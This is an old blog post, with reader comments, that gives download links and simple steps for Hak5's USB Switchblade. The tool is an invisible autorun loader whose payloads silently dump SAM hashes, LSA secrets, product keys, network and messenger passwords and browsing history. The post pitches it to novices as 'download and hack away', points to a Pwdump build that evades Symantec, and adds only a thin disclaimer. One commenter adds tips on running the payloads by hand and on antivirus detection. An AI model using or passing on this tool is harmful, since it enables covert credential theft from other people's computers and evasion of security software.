Instant USB Password Recovery Haker Tool (Download)

9 09 2006

USB Switchblade/Password Recovery Tool [via] Hak5 wiki
I am a big fan of download and hack away (noob friendly) posts. So I have boiled Hak5’s USB hacker tool down to some simple steps.

First – Download These:

Loader
This replaces the U3 partition on the Sandisk Cruizer Micro with an invisible autorun loader
http://www.hak5.org/releases/2×02/switchblade/MD1.0-loader.rar

Payload 1.1
This payload gathers IP information, dumps SAM, product keys, LSA secrets, network passwords, messenger passwords, and URL history.

http://www.hak5.org/releases/2×02/switchblade/MD1.1-payload.rar

Payload 1.2 (Pwdump update from BrainKill)

http://www.hak5.org/releases/2×02/switchblade/MD1.2-payload.rar
Updates either package with a version of Pwdump that is not detected by Symantec Anti-Virus.

SO all you need is a U3 capable USB stick then go at it.

Note:  See the site USB Switchblade Forum by from hak5 if you’re getting any erros.  The hack is still in developement.

*Disclaimer – I am not responsible for anyone’s choice to break the law.  This is simple a repost of a proof of concept hack.


Actions

Information

14 responses

20 09 2006
Darren Kitchen

Glad you enjoy the hack :)

–Darren, Hak5

21 09 2006
michel

hi im koko how r u

23 09 2006
kjd

how do i delete ie autocomplete passwords in lsa secrets on my own PC?

3 09 2007
robby

I still dont understand, and for some reason when i unpack the files, there’s errors in them! You see, I have some very important files on my cruzer 2.0 G smart drive, but i’ve completely forgotten my password, or rather someone else hacked it and changed it! Please Can you help me?

19 09 2008
grelaria

this won’t do anything to my files will it?

9 02 2010
Quazaka

This is awesome, cool trojan!

5 04 2010
azael

do u need to use a Sandisk Cruizer Micro? or will any usb work

13 04 2010
Makinbacon

Fail!!! An Anti-Virus will detect the trojan and the worm virus that is contained in the MD-1.2 Payload try a new script and this will work I understand the use of the malicious code(virus) but they are very detectable by some of the lowest forms of Anti-viruses. How old is this post? The U3 doesnt work right either though you dont need a U3 drive to run the 2 MD payloads just run them manually. This is meant for real prison seeking hackers. These tools are for and internal network where the Anti-Virus is on a server not each work-station.
Hope this helps all of you noob hackers.

13 04 2010
Makinbacon

Oh for the U3 just dont install the the loader.

1 11 2010
Mandela

I forgot my admin USB/CD/DVD Drive password. I have tried to activate the drives so as to format my Computer but could not. Is there help for that?

5 10 2011
31 01 2012
josh

Does this thing still actually work?

30 07 2013
Clash of Lords hacks

I seriously love your blog.. Great colors & theme. Did you make this
site yourself? Please reply back as I’m hoping to create my very own website and would love to know where you got this from or what the theme is named. Thank you!

31 07 2013
How-To: Cracking Passwords Techniques

Sweet blog! I found it while browsing on Yahoo News.
Do you have any suggestions on how to get listed in Yahoo
News? I’ve been trying for a while but I never seem to get there! Thank you

Leave a Reply

Follow

Get every new post delivered to your Inbox.

Join 47 other followers

